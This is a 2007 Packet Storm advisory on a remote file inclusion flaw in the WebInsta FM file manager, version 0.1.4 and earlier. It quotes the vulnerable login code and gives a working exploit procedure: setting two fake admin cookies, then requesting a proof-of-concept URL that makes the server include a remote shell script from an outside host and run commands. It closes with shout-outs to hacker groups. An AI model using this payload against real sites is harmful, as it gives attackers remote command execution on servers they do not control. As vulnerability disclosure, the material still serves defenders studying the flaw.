webinsta-rfi.txt

2007-04-17T00:00:00
ID PACKETSTORM:55960
Type packetstorm
Reporter MurderSkillz
Modified 2007-04-17T00:00:00

Description

                                        
                                            `Program Title ################################################################################  
WebInsta FM <= 0.1.4 Remote File Inclusion Vulnerability  
  
Description ##################################################################################  
This is a basic file manager written by WebInsta.com  
  
Vuln Code ####################################################################################  
In /admin/login.php:  
if(isset($_COOKIE['adminname']) && isset($_COOKIE['adminpass'])){  
$cusername = $_COOKIE['adminname'];  
$cpassword = $_COOKIE['adminpass'];  
include($absolute_path."admin/checkpass.php");  
}  
  
Exploit ######################################################################################  
In order for this exploit to work, you need to set two cookies. Once set, these cookies are  
never analyzed for their actual content. If you use FireFox, you can set them with the AnEC  
Cookie Editor extension. The two cookies should be set as follows:  
  
NAME - adminname  
CONTENT - anything here  
HOST - current site (www.site.com)  
PATH - nothing  
  
NAME - adminpass  
CONTENT - anything here  
HOST - current site (www.site.com)  
PATH - nothing  
  
Once set, the PoC URL is as follows:  
http://site.com/path/to/files/admin/login.php?absolute_path=http://shell.com/shell.txt?cmd=ls  
  
Note: Register globals must be ON, and Magic Quotes must be OFF for this exploit to work.  
  
Script Download ##############################################################################  
http://webinsta.com/cgi-bin/axs/ax.pl?http://www.webinsta.com/downloads/webinstafm.zip  
  
Original Advisory ############################################################################  
http://g00ns-forum.net/  
  
Shouts #######################################################################################  
g00ns.net  
13337.org  
rezen.org  
  
By MurderSkillz & FiSh of g00ns.net`